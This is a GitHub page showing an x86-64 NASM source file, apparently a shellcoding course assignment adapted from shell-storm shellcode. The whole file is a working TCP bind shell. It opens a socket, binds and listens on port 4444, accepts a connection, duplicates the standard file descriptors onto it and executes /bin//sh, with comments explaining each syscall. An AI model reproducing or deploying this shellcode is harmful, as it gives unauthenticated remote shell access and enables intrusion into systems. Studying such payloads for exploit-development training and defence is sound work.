-
Notifications
You must be signed in to change notification settings - Fork 3
/
assignment6-tcpbind.nasm
81 lines (60 loc) · 1.24 KB
/
assignment6-tcpbind.nasm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
;;;;; original code: http://shell-storm.org/shellcode/files/shellcode-858.php
global _start
section .text
_start:
;;;;; syscall socket()
xor rax,rax
add al, 0x29 ;41:syscall number
xor rdi,rdi
add rdi,0x2 ;2:AF_INET
xor rsi,rsi
inc rsi ;1:SOCK_STREAM
xor rdx,rdx ;0:INADDR_ANY
syscall
mov rdi,rax
;;;;syscall bind()
xor rax, rax
push rax
push rax ;0.0.0.0
push word 0x5C11 ;port 4444
push word 0x02 ;2:AF_INET
mov rsi,rsp
add rdx,0x10 ;16:length
add al, 0x31 ;49:syscall bind
syscall
;;; syscall listen
xor rax,rax
add al, 0x32 ;50:syscall listen
xor rsi,rsi
inc rsi ;1:backlog
syscall
;;;; syscall accept
xor rax,rax
add al, 0x2b ;43:syscall accept
xor rsi,rsi ;0:rsi
mov rdx,rsi ;0:rdx
syscall
mov r15,rax ;we'll save the socket handle for later phases
;;;;; dup2() syscall
xor rsi,rsi
add rsi, 0x02 ;counter with fd
mov rdi, r15 ;socket handle that we saved before
loop:
xor rax,rax
add al,0x21 ;33:syscall dup2
syscall
dec rsi
jns loop
;;;;; Syscall execve()
xor rax, rax
add rax, 59
xor r9, r9
push r9
mov rbx, 0x68732f6e69622f2f ;/bin//sh in reverse
push rbx
mov rdi, rsp
push r9
mov rdx, rsp
push rdi
mov rsi, rsp
syscall